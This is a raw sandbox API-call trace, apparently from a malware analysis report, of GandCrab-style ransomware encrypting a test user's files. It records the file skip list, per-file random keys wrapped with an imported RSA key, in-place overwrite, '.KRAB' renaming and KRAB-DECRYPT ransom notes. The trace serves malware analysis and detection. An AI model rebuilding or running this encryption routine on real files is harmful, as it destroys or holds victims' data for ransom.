wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".flv ") returned 5 [0086.564] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.564] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\0BKEAkHbyG3.flv") returned 77 [0086.564] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\0BKEAkHbyG3.flv") returned 77 [0086.564] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="desktop.ini") returned -1 [0086.564] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="autorun.inf") returned -1 [0086.564] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="ntuser.dat") returned -1 [0086.564] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="iconcache.db") returned -1 [0086.564] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="bootsect.bak") returned -1 [0086.564] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="boot.ini") returned -1 [0086.565] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="ntuser.dat.log") returned -1 [0086.565] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="thumbs.db") returned -1 [0086.565] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="KRAB-DECRYPT.html") returned -1 [0086.565] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.565] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.565] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="ntldr") returned -1 [0086.565] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="NTDETECT.COM") returned -1 [0086.565] lstrcmpiW (lpString1="0BKEAkHbyG3.flv", lpString2="Bootfont.bin") returned -1 [0086.565] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.565] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010ce8) returned 1 [0086.567] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.567] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.568] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.568] CryptGenRandom (in: hProv=0x1010ce8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0086.568] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0086.568] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.568] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011700) returned 1 [0086.570] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.570] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.570] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.570] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0086.570] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.571] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.571] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010820) returned 1 [0086.572] CryptImportKey (in: hProv=0x1010820, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10235f8) returned 1 [0086.572] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.572] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.573] GetLastError () returned 0x0 [0086.573] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.573] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0086.573] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011700) returned 1 [0086.574] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023338) returned 1 [0086.574] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.575] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.575] GetLastError () returned 0x0 [0086.575] CryptDestroyKey (hKey=0x1023338) returned 1 [0086.575] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.575] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\0BKEAkHbyG3.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\0bkeakhbyg3.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0086.576] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.576] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.576] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x7d9a, lpOverlapped=0x0) returned 1 [0086.589] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff8266, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.590] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x7d9a, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x7d9a, lpOverlapped=0x0) returned 1 [0086.590] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0086.590] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.594] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.594] CloseHandle (hObject=0x43c) returned 1 [0086.594] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.595] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\0BKEAkHbyG3.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\0bkeakhbyg3.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\0BKEAkHbyG3.flv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\0bkeakhbyg3.flv.krab")) returned 1 [0086.596] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.596] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.596] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0086.596] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0086.596] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\d2ca4a08d2ca4dee3d.lock" [0086.596] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.596] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0086.597] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\d2ca4a08d2ca4dee3d.lock") returned 85 [0086.597] lstrlenW (lpString=".lock") returned 5 [0086.597] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.597] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0086.597] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.597] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.598] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.598] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0086.598] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0086.598] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\KRAB-DECRYPT.txt" [0086.598] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.598] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\KRAB-DECRYPT.txt.KRAB") returned 83 [0086.598] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\KRAB-DECRYPT.txt") returned 78 [0086.598] lstrlenW (lpString=".txt") returned 4 [0086.598] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.599] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0086.599] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.599] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\KRAB-DECRYPT.txt") returned 78 [0086.599] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\KRAB-DECRYPT.txt") returned 78 [0086.599] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.599] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.599] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0086.599] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.599] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.599] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.599] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0086.599] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0086.599] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0086.600] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0086.600] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.600] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.600] lstrcmpW (lpString1="UAwLkPAfa.mp3", lpString2=".") returned 1 [0086.600] lstrcmpW (lpString1="UAwLkPAfa.mp3", lpString2="..") returned 1 [0086.600] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\", lpString2="UAwLkPAfa.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\UAwLkPAfa.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\UAwLkPAfa.mp3" [0086.600] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.600] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\UAwLkPAfa.mp3.KRAB") returned 80 [0086.600] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\UAwLkPAfa.mp3") returned 75 [0086.600] lstrlenW (lpString=".mp3") returned 4 [0086.600] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.601] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0086.601] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.601] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\UAwLkPAfa.mp3") returned 75 [0086.601] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\UAwLkPAfa.mp3") returned 75 [0086.601] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="desktop.ini") returned 1 [0086.601] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="autorun.inf") returned 1 [0086.601] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="ntuser.dat") returned 1 [0086.601] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="iconcache.db") returned 1 [0086.601] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="bootsect.bak") returned 1 [0086.601] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="boot.ini") returned 1 [0086.602] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="ntuser.dat.log") returned 1 [0086.602] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="thumbs.db") returned 1 [0086.602] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0086.602] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.602] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.602] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="ntldr") returned 1 [0086.602] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="NTDETECT.COM") returned 1 [0086.602] lstrcmpiW (lpString1="UAwLkPAfa.mp3", lpString2="Bootfont.bin") returned 1 [0086.602] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.602] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011458) returned 1 [0086.604] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.604] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.604] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.605] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0086.605] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0086.605] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.605] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011700) returned 1 [0086.606] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.607] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.607] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.607] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0086.607] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.607] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.608] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0086.610] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1022ff8) returned 1 [0086.610] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.610] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.611] GetLastError () returned 0x0 [0086.611] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.611] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.611] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10113d0) returned 1 [0086.612] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023338) returned 1 [0086.612] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.613] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.613] GetLastError () returned 0x0 [0086.613] CryptDestroyKey (hKey=0x1023338) returned 1 [0086.613] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0086.613] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\UAwLkPAfa.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\uawlkpafa.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0086.614] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.614] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.614] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x626e, lpOverlapped=0x0) returned 1 [0086.628] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff9d92, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.628] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x626e, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x626e, lpOverlapped=0x0) returned 1 [0086.628] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0086.628] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.632] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.632] CloseHandle (hObject=0x43c) returned 1 [0086.637] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.637] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\UAwLkPAfa.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\uawlkpafa.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\UAwLkPAfa.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\uawlkpafa.mp3.krab")) returned 1 [0086.639] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.639] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.639] lstrcmpW (lpString1="wcwUc CH.bmp", lpString2=".") returned 1 [0086.639] lstrcmpW (lpString1="wcwUc CH.bmp", lpString2="..") returned 1 [0086.640] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\", lpString2="wcwUc CH.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\wcwUc CH.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\wcwUc CH.bmp" [0086.640] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.640] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\wcwUc CH.bmp.KRAB") returned 79 [0086.640] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\wcwUc CH.bmp") returned 74 [0086.640] lstrlenW (lpString=".bmp") returned 4 [0086.640] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.641] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0086.641] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.641] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\wcwUc CH.bmp") returned 74 [0086.641] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\wcwUc CH.bmp") returned 74 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="desktop.ini") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="autorun.inf") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="ntuser.dat") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="iconcache.db") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="bootsect.bak") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="boot.ini") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="ntuser.dat.log") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="thumbs.db") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="ntldr") returned 1 [0086.641] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="NTDETECT.COM") returned 1 [0086.642] lstrcmpiW (lpString1="wcwUc CH.bmp", lpString2="Bootfont.bin") returned 1 [0086.642] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.642] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010b50) returned 1 [0086.643] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.644] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.644] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 